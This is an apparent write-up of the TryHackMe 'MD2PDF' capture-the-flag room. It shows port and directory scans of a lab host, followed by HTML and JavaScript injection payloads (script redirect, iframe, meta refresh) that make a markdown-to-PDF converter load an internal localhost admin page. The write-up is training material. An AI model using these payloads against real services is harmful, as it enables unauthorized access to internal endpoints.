INTRODUCTION
Hello Hacker!
TopTierConversions LTD is proud to announce its latest and greatest product launch: MD2PDF.
This easy-to-use utility converts markdown files to PDF and is totally secure! Right…?
This an easy rated room in tryhackme exploiting pdf xss.
The challenge can be foud here. https://tryhackme.com/room/md2pdf
Initial recon - Port scanning
The first step is to conduct a port scan to identify open ports and the services that are running on those ports. Lets run nmap.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap -sC 10.10.26.251 -o nmap.out
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 07:28 EAT
Nmap scan report for 10.10.26.251
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 3072 cd:bd:77:b7:fd:a3:fc:9e:f5:bd:74:30:61:74:2f:24 (RSA)
| 256 0f:f5:6f:f8:39:38:47:a5:89:87:dc:61:3e:4f:8c:32 (ECDSA)
|_ 256 67:3e:8a:79:5d:83:12:e6:65:42:11:07:62:15:1e:d2 (ED25519)
80/tcp open http
|_http-title: MD2PDF
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 41.90 seconds
Directory Scanning
Let’s scan for directories using gobuster.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
gobuster dir -u http://10.10.26.251/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.26.251/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/23 16:41:46 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 403) [Size: 166]
/convert (Status: 405) [Size: 178]
Checking ot the Directories
There is a /admin directory. Upon visiting this directory, there is some interesting information. It s only accessible through localhost:5000/admin
Test for XSS
To test for this we go back to the root directory http://10.10.26.251/ . Here we have to establish acces to localhost:5000/admin.
I try some payoads to seee if we have anything interesting.
<script>alert(1)</script>
All the above are just giving a blank screen instead of fetching the flag. However, it tells us we are close but have to adjust our payloads.
<script>document.write(document.location.href)</script> returns something interesting.
After trying multiple techniques, I employ a new technique.
Javascript Code Injection
Let’s check the page source for clues.
I can try to tell the script to redirect me to the admin directory. I finally manage to get working scripts and the fetch the flag. :)
1
2
3
<script>
window.location.href = 'http://localhost:5000/admin';
</script>
1
2
<iframe src="http://localhost:5000/admin" height="1000" width="1000">
</iframe>
1
<meta http-equiv="refresh" content="0;URL='http://localhost:5000/admin'">
And we have the flag.
